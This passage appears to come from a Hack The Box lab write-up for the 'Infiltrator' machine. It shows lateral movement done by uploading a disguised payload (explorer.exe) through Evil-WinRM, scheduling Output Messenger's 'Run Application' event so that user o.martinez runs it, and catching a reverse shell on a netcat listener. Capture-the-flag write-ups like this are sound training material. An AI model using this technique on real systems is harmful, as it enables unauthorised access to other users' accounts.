o.martinez
It has been suspected that created events are getting executed. Given there is an action, Run Application, I might be able to get code execution on the dc01.infiltrator.htb host
*Evil-WinRM* PS C:\> mkdir tmp ; cd tmp
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/3/2024 12:25 PM tmp
*Evil-WinRM* PS C:\tmp> upload explorer.exe .
Info: Uploading /home/kali/archive/htb/labs/infiltrator/explorer.exe to C:\tmp\.
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!Created a directory C:\tmp and placed the payload
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> cmd /c time /t
12:51 PMChecking the time as well
Setting up a new event to execute the planted payload at 1300H
It throws an error that the file doesn’t exist
I would need to create a file on the Windows machine just to get past this error.
The o.martinez user would then login to the Output Messenger application from the dc01.infiltrator.htb host
PS C:\> mkdir tmp ; cd tmp ; echo blah > explorer.exeSo I created the same environment; C:\tmp\explorer.exe
and saved
I also logged out, so that the o.martinez user can log back in from the dc01.infiltrator.htb host
Logged back in as the k.turner user to observe
The o.martinez user is online
*Evil-WinRM* PS C:\tmp> cmd /c time /t
12:57 PMIt should run the application in 3 minutes
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ nnc 7777
listening on [any] 7777 ...
connect to [10.10.15.34] from (UNKNOWN) [10.129.60.111] 54233
Microsoft Windows [Version 10.0.17763.6189]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
whoami
infiltrator\o.martinez
C:\Windows\system32> hostname
hostname
dc01
C:\Windows\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.60.111
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1Lateral Movement made to the o.martinez user